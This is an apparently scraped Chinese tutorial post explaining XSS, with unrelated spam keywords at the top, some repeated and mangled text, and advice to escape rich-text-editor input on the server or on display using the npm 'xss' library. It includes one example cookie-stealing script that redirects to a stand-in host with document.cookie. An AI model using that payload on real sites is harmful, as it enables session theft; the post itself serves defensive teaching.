免费微网站案例,个人怎样申请注册公司,设计方案文本,人力资源外包收费报价表XSS 攻击漏洞是什么
XSS(Cross-Site Scripting)攻击#xff1a;通过在网站上植入恶意脚本来攻击用户
举例说明
在留言板发布评论#xff0c;评论内容包含恶意脚本#xff1a;
scriptdocument.location http://xxx.com/getCookie?cookie document…XSS 攻击漏洞是什么
XSS(Cross-Site Scripting)攻击通过在网站上植入恶意脚本来攻击用户
举例说明
在留言板发布评论评论内容包含恶意脚本
scriptdocument.location http://xxx.com/getCookie?cookie document.cookie;/script当用户看到评论时就会触发响应将用户cookie发送到攻击者手中
问题描述
前端使用wangeditor富文本编辑器正常情况下编辑器都会把内容进行转码处理转码之后就回避xss问题这次的问题是通过一些手段提及内容比如postman这样提交的代码就没有经过编辑器进行转码读取数据时就会触发恶意代码。
解决方法
方法一后端拿到数据后再进行一次转码保障进入数据库的内容是转码后的方法二读取后端数据后对要展示的数据再进行一次转码相当于保存和读取都进行转码。
转码工具
https://jsxss.com/zh/index.html
// 安装
npm i xss
// 引用
import filterXSS from xss
const newStrfilterXSS(htmlStr); // 进行转码
